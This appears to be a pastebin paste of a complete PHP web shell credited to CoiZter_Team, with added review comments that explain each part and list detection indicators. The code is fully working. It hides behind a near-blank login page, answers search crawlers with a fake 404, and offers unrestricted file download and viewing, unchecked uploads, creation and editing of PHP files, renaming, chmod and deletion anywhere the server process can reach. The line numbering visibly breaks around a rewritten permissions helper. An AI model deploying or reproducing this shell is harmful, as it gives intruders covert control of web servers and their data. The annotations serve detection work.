
undork

a guest
Apr 26th, 2018
  1. <?php
  // NOTE(review): PHP file-manager web shell sample. The statements below switch
  // off PHP error display and PHP error logging and remove the execution time
  // limit. They act on PHP's own error reporting only.
  2. session_start();
  3. error_reporting(0);
  4. set_time_limit(0);
  5. @clearstatcache();
  6. @ini_set('error_log',NULL);
  7. @ini_set('log_errors',0);
  8. @ini_set('max_execution_time',0);
  9. @ini_set('output_buffering',0);
  10. @ini_set('display_errors', 0);
  // 32 hex characters that are compared further down with md5($_POST['pass']):
  // an unsalted MD5 of the access password. The literal is a static indicator
  // for this sample when searching a web root.
  11. $auth_pass = "579a460d4f1cf099569b9b9e1d6e5c70";
  // The next four settings are not referenced again anywhere in this listing.
  12. $color = "white";
  13. $default_action = 'FilesMan';
  14. $default_use_ajax = true;
  15. $default_charset = 'UTF-8';
  16.  
  // Crawler filter: when the User-Agent header contains one of the names below
  // (case-insensitive), the script sends "404 Not Found" and exits before any
  // other output. The same URL therefore answers differently to a crawler
  // User-Agent than to a browser one - presumably to stay out of search indexes.
  17. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  18. $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  19. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  20. header('HTTP/1.0 404 Not Found');
  21. exit;
  22.  
  23. }
  24.  
  25. }
  26.  
  // Prints the login page and ends the request (the `exit` on the last line of
  // the body). The page is titled "about:blank", uses maroon-on-white text and
  // holds a single 20px-wide password input with a 0px border, posted as field
  // `pass` to the same URL - so the response looks like an almost empty page.
  27. function login_shell() {
  28. ?>
  29. <html>
  30. <head>
  31. <title>about:blank</title>
  32. <style type="text/css">
  33.  
  34. html {
  35. margin: 0px auto;
  36. background: white;
  37. color: maroon;
  38. text-align: center;
  39. }
  40. header {
  41. color: maroon;
  42. margin: 10px auto;
  43. }
  44. input[type=password] {
  45. width: 20px;
  46. height: 15px;
  47. color: maroon;
  48. background: white;
  49. border: 0px dotted white;
  50. padding: 5px;
  51. margin-left: 20px;
  52. text-align: center;
  53.  
  54. }
  55. </style>
  56. </head>
  57. <center>
  58. <form method="post">
  59. <input type="password" name="pass">
  60. </form>
  61. <?php exit;
  62. }
  // Access gate. The session flag is stored under md5() of the Host header; once
  // it is set, later requests in the same session skip the password check. The
  // flag is set when $auth_pass is empty or when md5($_POST['pass']) loosely
  // equals $auth_pass; otherwise login_shell() prints the form and exits.
  // Both `if`s are unbraced, so the `else` belongs to the inner one.
  63. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
  // NOTE(review): the tail of the next physical line, starting at
  // `if(isset($_GET['file'])`, is a separate statement outside the gate's `if`:
  // a download handler. It is reached only after the gate has passed, because
  // login_shell() exits. With ?file=<path>&act=download it streams that path via
  // readfile() as an attachment, with no restriction on the path. The parameter
  // pair `file` + `act=download` in access logs is an indicator for this sample.
  64. if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) ) $_SESSION[md5($_SERVER['HTTP_HOST'])] = true; else login_shell(); if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  65. @ob_clean(); $file = $_GET['file'];
  66. header('Content-Description: File Transfer');
  67. header('Content-Type: application/octet-stream');
  68. header('Content-Disposition: attachment; filename="'.basename($file).'"');
  69. header('Expires: 0');
  70. header('Cache-Control: must-revalidate');
  71. header('Pragma: public');
  72. header('Content-Length: ' . filesize($file));
  73. readfile($file);
  74. exit;
  75. } ?>
  76. <?php
  // Repeats the time-limit and error-reporting settings from the top of the file.
  77. set_time_limit(0);
  78. error_reporting(0);
  79.  
  // Undoes legacy magic-quotes escaping on every POST field.
  // NOTE(review): get_magic_quotes_gpc() no longer exists in PHP 8, so how much
  // of the code after this point is reachable depends on the host's PHP version -
  // confirm the version when triaging a host where this file was found.
  80. if(get_magic_quotes_gpc()){
  81. foreach($_POST as $key=>$value){
  82. $_POST[$key] = stripslashes($value);
  83. }
  84. }
  // Start of the panel's HTML document.
  85. echo '<!DOCTYPE HTML>
  86. <html>
  87. <head>
  88. <title>Online</title>
  89. </head>';
  90. ?>
  91. <style>
  92. @font-face {
  93. font-family: 'Audiowide';
  94. font-style: normal;
  95. font-weight: 400;
  96. src: local('Comic Sans MS'), local('ComicSansMS'), url(http://fonts.gstatic.com/l/font?kit=3oir0CAJ0QJ5h5-A3AP8rRSrmRvs-bRaaQbSAUyiv7A&skey=a4ba60ff9fc73cf8&v=v8) format('truetype');
  97. }
  98. body {
  99.  
  100. background: #353533;line-height: 1;color: #fff;font-family: Comic Sans MS ;
  101.  
  102. }
  103.  
  104. table, th, td {
  105. border-collapse:collapse;
  106. background: transparent;
  107. font-family: Comic Sans MS ;
  108. font-size: 30px;
  109. }
  110. input, textarea { font-family: Comic Sans MS ; }
  111. .table_home, .th_home, .td_home { color:silver;
  112. border: 1px solid red;
  113. }
  114. th {
  115. padding: 10px;
  116. }
  117. .td_home { padding: 7px; }
  118. select {font-family: Comic Sans MS }
  119. a {color:red}
  120. textarea { width: 700%;height: 400px; }
  121. </style>
  122. <style>
  123. .blink {
  124. animation: blink-animation 1s steps(5, start) infinite;
  125. -webkit-animation: blink-animation 1s steps(5, start) infinite;
  126. }
  127. @keyframes blink-animation {
  128. to {
  129. visibility: hidden;
  130. }
  131. }
  132. @-webkit-keyframes blink-animation {
  133. to {
  134. visibility: hidden;
  135. }
  136. }
  137. </style>
  138.  
  139. <?php
  140.  
  // Panel banner. The echo ends by printing php_uname(), which shows the
  // server's operating system and host details to whoever reaches the panel.
  141. echo '</head>
  142. <body><b>
  143. <center><span class="blink"><font family="Audiowide" size="500px" color="orange" style="text-shadow: 7px 0px 30px red">Control Panel</span></font></center>
  144. <table width="100%" border="0" cellpadding="1" cellspacing="0" align="center">
  145.  
  146. <tr><td>
  147.  
  148. </font><font style="text-shadow: 7px 0px 30px red" size="4px" color="silver"><center>'.php_uname().'</center></font>';
  // Working directory: taken verbatim from ?path= when present, otherwise the
  // script's current directory. Nothing below confines it to a base directory,
  // so any directory the PHP process can read can be listed.
  149. if(isset($_GET['path'])){
  150. $path = $_GET['path'];
  151. }else{
  152. $path =
  153. getcwd();
  154.  
  155. }
  // Backslashes are normalised to "/" and the path is split into segments.
  156. $path = str_replace('\\','/',$path);
  157. $paths = explode('/',$path);
  158.  
  // Breadcrumb: one link per path segment, each pointing at ?path=<prefix>.
  // The segments are echoed without HTML escaping.
  159. foreach($paths as $id=>$pat){
  160. if($pat == '' && $id == 0){
  161. $a = true;
  162. echo '<font size="5px" color=silver style="text-shadow: 7px 0px 30px red"><center>localhost@kehed:~# <font color=teal style="text-shadow: 7px 0px 30px red"><a href="?path=/">/</a>';
  163. continue;
  164. }
  165. if($pat == '') continue;
  166. echo '<a href="?path=';
  167. for($i=0;$i<=$id;$i++){
  168. echo "$paths[$i]";
  169. if($i != $id) echo "/";
  170. }
  171. echo '">'.$pat.'</a>/';
  172. }
  173. echo '</font></center></td></tr><tr><td><center>';
  // Upload handler: the uploaded file is copied into $path under the filename
  // supplied by the client; name, extension and content are not checked.
  // NOTE(review): for detection, multipart POSTs to this script followed by new
  // files in the directory named by ?path= are the trace this branch leaves.
  174. if(isset($_FILES['file'])){
  175. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
  176. echo '<font color="teal">Sukses</font><br />';
  177. }else{
  178. echo '<font color="red">Failed -/\-</font><br />';
  179. }
  180. }
  // Upload form (multipart POST to the current URL, field name `file`).
  181. echo '</center><center><form enctype="multipart/form-data" method="POST"><font size="50px" color="black" style="text-shadow: 7px 0px 30px red"><input style="background:black;font-family:Audiowide;width:30% " type="file" name="file" /> <input type="submit" value=">>>" />
  182. </form></center>
  183. </td></tr>';
  // Request dispatcher for the rest of the panel. Three cases:
  //   ?filesrc=...                    show a file's contents (read-only view)
  //   ?option with opt != 'delete'    chmod / new-folder form / rename / new file / edit
  //   anything else                   optional delete or mkdir, then the directory listing
  // NOTE(review): the query keys path, filesrc, option, opt, type, name and the
  // POST fields perm, newname, src, name1, buat, path are the request-level
  // indicators this code leaves in web and WAF logs.
  // View branch: the ?filesrc= value is echoed unescaped and the file it names is
  // read with file_get_contents() with no path restriction.
  184. if(isset($_GET['filesrc'])){
  185. echo "<tr><td><center>Current File : ";
  186. echo $_GET['filesrc'];
  187. echo '</center></tr></td></table><br />';
  188. echo(' <textarea style="width: 100%;height: 400px;" readonly> '.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</textarea>');
  189. }
  190. //Empty
  191. elseif(isset($_GET['option']) && $_GET['opt'] != 'delete'){
  192. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
  193. //Chmod
  // Applies the POSTed `perm` value to the POSTed `path` with chmod(), then
  // shows a form pre-filled with the current mode of <GET path>/<GET name>.
  194. if($_GET['opt'] == 'chmod'){
  195. if(isset($_POST['perm'])){
  196. if(chmod($_POST['path'],$_POST['perm'])){
  197. echo '<font color="teal">Change Permission Done </font><br />';
  198. }else{
  199. echo '<font color="red">Change Permission Error </font><br />';
  200. }
  201. }
  202.  
  203. $hell = $_GET['path'];
  204. $yeah = $_GET['name'];
  205. $patc = "$hell/$yeah";
  206.  
  207. echo '<form method="POST">
  208. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($patc)), -4).'" />
  209. <input type="hidden" name="path" value="'.$_POST['path'].'">
  210. <input type="hidden" name="opt" value="chmod">
  211. <input type="submit" value=">>>" />
  212. </form>';
  213. }
  214. // New-folder form: posts to the delete/"buat" branch further down
  215. elseif($_GET['opt'] == 'btw'){
  216. $cwd = getcwd();
  217. echo '<form action="?option&path='.$cwd.'&opt=delete&type=buat" method="POST">
  218. New Name : <input name="name" type="text" size="20" value="Folder" />
  219. <input type="hidden" name="path" value="'.$cwd.'">
  220. <input type="hidden" name="opt" value="delete">
  221. <input type="submit" value=">>>" />
  222. </form>';
  223. }
  224. //Rename file
  // rename() from the POSTed `path` to $path/<POSTed newname>.
  225. elseif($_GET['opt'] == 'rename'){
  226. if(isset($_POST['newname'])){
  227. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
  228. echo '<font color="teal">Change Name Done </font><br />';
  229. }else{
  230. echo '<font color="red">Change Name Error </font><br />';
  231. }
  232. $_POST['name'] = $_POST['newname'];
  233. }
  234. $hell = $_GET['path'];
  235. $yeah = $_GET['name'];
  236. $patc = "$hell/$yeah";
  237. $new = $_POST['newname'];
  238.  
  239. echo '<form method="POST">
  240. New Name : <input name="newname" type="text" size="20" value="'.$new.'" />
  241. <input type="hidden" name="path" value="'.$patc.'">
  242. <input type="hidden" name="opt" value="rename">
  243. <input type="submit" value=">>>" />
  244. </form>';
  245. }
  246. //New file
  // Writes the POSTed `src` text to the POSTed `path` (opened with mode 'w',
  // which truncates an existing file). This is the branch that places new
  // files, including new PHP files, on disk.
  247. elseif($_GET['opt'] == 'baru'){
  248.  
  249. $hell = $_GET['path'];
  250. $yeah = $_GET['name'];
  251. $patc = "$hell/$yeah";
  252. $new = $_POST['newname'];
  253. $azz = $_POST['path'];
  254. $newz = "$azz/$new";
  255.  
  256.  
  257. if(isset($_POST['src'])){
  258. $fp = fopen($_POST['path'],'w');
  259. if(fwrite($fp,$_POST['src'])){
  260. echo '<font color="teal">Create File Done [ '.$new.' ]</font><br />';
  261. }else{
  262. echo '<font color="red">Create File Error </font><br />';
  263. }
  264. fclose($fp);
  265. }
  266.  
  267. echo '<form method="POST"> Name : <input name="name1" type="text" size="20" value="'.$new.'" /><input type="submit" name="buat" value=">>>"/></form><br> ';
  268.  
  269. $ho = $_POST['name1'];
  270.  
  271. if(isset($_POST['buat'])){
  272. echo '<form method="POST">
  273. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($patc)).'</textarea><br />
  274. <input type="hidden" name="path" value="'.$hell.'/'.$ho.'">
  275. <input type="hidden" name="opt" value="edit">
  276. <input type="submit" value=">>>" />
  277. </form>';
  278. }
  279. }
  280. //Edited file
  // Overwrites the POSTed `path` with the POSTed `src`, then shows an edit form
  // loaded with the current contents of <GET path>/<GET name>. Existing site
  // files can be modified through this branch.
  281. elseif($_GET['opt'] == 'edit'){
  282. if(isset($_POST['src'])){
  283. $fp = fopen($_POST['path'],'w');
  284. if(fwrite($fp,$_POST['src'])){
  285. echo '<font color="teal">Edit File Done </font><br />';
  286. }else{
  287. echo '<font color="red">Edit File Error </font><br />';
  288. }
  289. fclose($fp);
  290. }
  291. $hell = $_GET['path'];
  292. $yeah = $_GET['name'];
  293. $patc = "$hell/$yeah";
  294. echo '<form method="POST">
  295. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($patc)).'</textarea><br />
  296. <input type="hidden" name="path" value="'.$patc.'">
  297. <input type="hidden" name="opt" value="edit">
  298. <input type="submit" value=">>>" />
  299. </form>';
  300. }
  301. echo '</center>';
  302. }else{
  303. echo '</table><br /><center>';
  304. //Delete dir and file
  // Destructive operations, selected by ?type=: rmdir() for 'dir', mkdir() for
  // 'buat', unlink() for 'file'. Target paths are built from request values.
  305. if(isset($_GET['option']) && $_GET['opt'] == 'delete'){
  306.  
  307. $hell = $_GET['path'];
  308. $yeah = $_GET['name'];
  309. $patc = "$hell/$yeah";
  310.  
  311. //Delete dir
  312. if($_GET['type'] == 'dir'){
  313.  
  314. if(rmdir($patc)){
  315. echo '<font color="teal">Delete File Done </font><br />';
  316. }else{
  317. echo '<font color="red#">Delete File Error </font><br />';
  318. }
  319. }
  320. //Create folder
  321. if($_GET['type'] == 'buat'){
  322. $haaa = $_POST['path'];
  323. $heee = $_POST['name'];
  324. $hooo = "$haaa/$heee";
  325. $new = $haaa.'/'.htmlspecialchars($heee);
  326. if(!mkdir($new)){
  327. echo '<font color="red">Create Folder Error </font><br />';
  328. }else{
  329. echo '<font color="teal">Create Folder Done </font><br />';
  330. }
  331. }
  332. //Delete file
  333. elseif($_GET['type'] == 'file'){
  334.  
  335. $hell = $_GET['path'];
  336. $yeah = $_GET['name'];
  337. $patc = "$hell/$yeah";
  338.  
  339. if(unlink($patc)){
  340. echo '<font color="teal">Delete File Done </font><br />';
  341. }else{
  342. echo '<font color="red#">Delete File Error </font><br />';
  343. }
  344. }
  345. }
  346. echo '</center>';
  // Directory listing of $path: sub-directories first, then files. Every row
  // shows the mode string from perms() and links that feed the branches above.
  // Directory and file names are echoed without HTML escaping.
  347. $scandir = scandir($path);
  348. $pa = getcwd();
  349. echo ' <table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
  350. <tr>
  351. <th class=th_home style="background:black;color:silver;text-shadow: 7px 0px 30px red;" ><center>Name</center></th>
  352. <th class=th_home style="background:black;color:silver;text-shadow: 7px 0px 30px red;" ><center>Size</center></th>
  353. <th class=th_home style="background:black;color:silver;text-shadow: 7px 0px 30px red;" ><center>Perm</center></th>
  354. <th class=th_home style="background:black;color:silver;text-shadow: 7px 0px 30px red;" ><center>Options</center></th>
  355. </tr> <tr>
  356. <td class=td_home>..</td><td class=td_home align=center>-</td> <td class=td_home align=center>-</td> <td class=td_home align=center> <a href="?option&path='.$pa.'&opt=baru&name=new.php">{file}</a> | <a href="?option&path='.$pa.'&opt=btw&type=dir">{dir}</a> </td></tr>
  357. ';
  358.  
  // Pass 1: directories only ('.' and '..' skipped).
  359. foreach($scandir as $dir){
  360. if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
  361. echo "
  362. <tr>
  363. <td class=td_home> <img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='> <a href=\"?path=$path/$dir\">$dir</a></td>
  364. <td class=td_home ><center>dir</center></td>
  365. <td class=td_home ><center>";
  // Mode string is coloured teal when writable, red when unreadable.
  366. if(is_writable("$path/$dir")) echo '<font color="teal">';
  367. elseif(!is_readable("$path/$dir")) echo '<font color="red">';
  368. echo perms("$path/$dir");
  369. if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
  370.  
  371. echo "</center></td>
  372. <td class=td_home ><center>
  373. <a href=\"?option&path=$path&opt=rename&type=dir&name=$dir\">{r}</a> <a href=\"?option&path=$path&opt=delete&type=dir&name=$dir\">{d}</a> <a href=\"?option&path=$path&opt=chmod&type=dir&name=$dir\">{c}</a>
  374.  
  375. </center></td>
  376. </tr>";
  377. }
  378. echo '<br>';
  // Pass 2: regular files, with size shown in KB, or MB from 1024 KB upwards.
  379. foreach($scandir as $file){
  380. if(!is_file("$path/$file")) continue;
  381. $size = filesize("$path/$file")/1024;
  382. $size = round($size,3);
  383. if($size >= 1024){
  384. $size = round($size/1024,2).' MB';
  385. }else{
  386. $size = $size.' KB';
  387. }
  388.  
  389. echo "<tr>
  390. <td class=td_home > <img src='data:image/png;base64,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'> <a href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
  391. <td class=td_home><center>".$size."</center></td>
  392. <td class=td_home><center>";
  393. if(is_writable("$path/$file")) echo '<font color="teal">';
  394. elseif(!is_readable("$path/$file")) echo '<font color="red">';
  395. echo perms("$path/$file");
  396. if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
  397. echo "</center></td>
  398. <td class=td_home><center>
  399. <a href=\"?option&path=$path&opt=edit&type=file&name=$file\"> {e} </a> <a href=\"?option&path=$path&opt=rename&type=file&name=$file&path=$path\"> {r} </a> <a href=\"?option&path=$path&opt=delete&type=file&name=$file\"> {d} </a> <a href=\"?option&path=$path&opt=chmod&type=file&name=$file\"> {c} </a>
  400. </center></td>
  401. </tr>";
  402. }
  403. echo '</table>
  404. </div>';
  405. }
  // Footer; the "CoiZter_Team" string is a further static indicator for this sample.
  406. echo '<br><center><font color="silver" style="text-shadow: 7px 0px 30px red"> Copyright - CoiZter_Team</b></body>
  407. </html>';
  /**
   * Format the mode bits of a path as a ten-character string: one file-type
   * letter followed by read/write/execute triplets for owner, group and world.
   *
   * Type letters: s socket, l symbolic link, - regular file, b block special,
   * d directory, c character special, p FIFO, u when no type mask matches.
   * In each triplet the execute slot shows s/S (setuid, setgid) or t/T (sticky)
   * when the matching special bit is set; the upper-case form means the
   * execute bit itself is clear.
   *
   * @param string $file Path handed to fileperms().
   * @return string The formatted mode, e.g. "-rw-r--r--".
   */
  function perms($file){
      $mode = fileperms($file);

      // Tested in this order; the first mask whose bits are all present wins.
      $typeLetters = array(
          0xC000 => 's',
          0xA000 => 'l',
          0x8000 => '-',
          0x6000 => 'b',
          0x4000 => 'd',
          0x2000 => 'c',
          0x1000 => 'p',
      );

      $out = 'u';
      foreach ($typeLetters as $mask => $letter) {
          if (($mode & $mask) === $mask) {
              $out = $letter;
              break;
          }
      }

      // Per class: read bit, write bit, execute bit, special bit,
      // letter for execute+special, letter for special without execute.
      $classes = array(
          array(0x0100, 0x0080, 0x0040, 0x0800, 's', 'S'), // owner / setuid
          array(0x0020, 0x0010, 0x0008, 0x0400, 's', 'S'), // group / setgid
          array(0x0004, 0x0002, 0x0001, 0x0200, 't', 'T'), // world / sticky
      );

      foreach ($classes as $bits) {
          list($read, $write, $exec, $special, $withExec, $withoutExec) = $bits;

          $out .= ($mode & $read) ? 'r' : '-';
          $out .= ($mode & $write) ? 'w' : '-';

          if ($mode & $exec) {
              $out .= ($mode & $special) ? $withExec : 'x';
          } else {
              $out .= ($mode & $special) ? $withoutExec : '-';
          }
      }

      return $out;
  }
  460.  
  461. ?>